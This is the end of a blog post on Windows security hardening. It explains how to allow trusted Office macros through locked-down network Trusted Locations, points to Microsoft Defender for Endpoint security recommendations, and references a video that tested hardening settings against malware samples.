    • To avoid problems with users who need valid/trusted Macros, you can enable two additional settings:
      • Allow Trusted Locations on the network
        • Lock down the NTFS and/or Share Permissions to only allow authorized users (admins?) from adding Macros to this path (Ask each Department to provide Macros for review)
      • Trusted Location #1 (through #20)
        • This is where you can specify the network path of where the authorized Macros can run from

I will be updating this blog periodically as I encounter additional settings that are particularly helpful for blocking threats.

Update: @djteller (Tomer Teller) pointed out that the Threat and Vulnerability Management (TVM) feature inside MDE has a Security Recommendations section which includes these recommendations, and many other great ones (69 total). Check it out inside your MDE Tenant here:
https://security.microsoft.com/security-recommendations

One of my customers pointed me to this YouTube Video which shows how some of these hardening settings did against 800 malware samples, click (here) to watch the video. Note: the author was working with the standard version of Windows Defender, and I imagine the four threats that got through would have been blocked if ASR had been enabled (ASR is not available in the free edition of Defender).

Disclaimer: This is for educational purposes only, you assume all risk for testing these in your lab first before deploying to production.